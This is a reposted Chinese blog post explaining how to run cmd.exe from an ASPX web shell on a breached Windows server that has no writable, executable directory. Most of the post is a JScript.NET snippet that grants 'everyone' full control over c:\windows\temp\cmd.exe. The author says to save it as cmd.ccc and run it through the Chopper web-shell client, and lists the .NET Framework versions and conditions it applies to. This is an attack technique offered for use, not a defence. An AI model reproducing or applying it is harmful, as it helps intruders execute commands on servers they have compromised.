码迷,mamicode.com
首页 > Web开发 > 详细

aspxshell下突破无可写可执行目录执行cmd

时间:2017-09-11 19:51:10      阅读:227      评论:0      收藏:0      [点我收藏+]

标签:xshell   style   安全模式   access   .com   cmd   cto   html   cat   

try
{

var strPath:String = "c:\\windows\\temp\\cmd.exe", strUser:String = "everyone";
var dirinfo:System.IO.DirectoryInfo = new System.IO.DirectoryInfo(strPath);

var dirsecurity:System.Security.AccessControl.DirectorySecurity = dirinfo.GetAccessControl();

dirsecurity.AddAccessRule(new System.Security.AccessControl.FileSystemAccessRule(strUser,
    System.Security.AccessControl.FileSystemRights.FullControl,
    System.Security.AccessControl.AccessControlType.Allow));

dirinfo.SetAccessControl(dirsecurity);
Response.Write(strPath+"\t权限添加成功!");

}catch(x){Response.Write(x.Message);}

保存为cmd.ccc,使用菜刀自写脚本运行即可突破

受影响的版本为:

Microsoft .NET Framework 2.0 

Microsoft .NET Framework 3.5

Microsoft .NET Framework 3.5.1

Microsoft .NET Framework 4

Microsoft .NET Framework 4.5

Microsoft .NET Framework 4.5.1

 

利用条件:

1.需要支持aspx并且高于Microsoft .NET Framework 1.14版本

2.安全模式除外(现在还没有能突破.net安全模式的方法)

漏洞说明:该漏洞可直接赋予文件权限(让没权限的文件执行)

 

 

文章转载自:http://www.xlgps.com/article/39438.html

aspxshell下突破无可写可执行目录执行cmd

标签:xshell   style   安全模式   access   .com   cmd   cto   html   cat   

原文地址:http://www.cnblogs.com/penguinCold/p/7506167.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!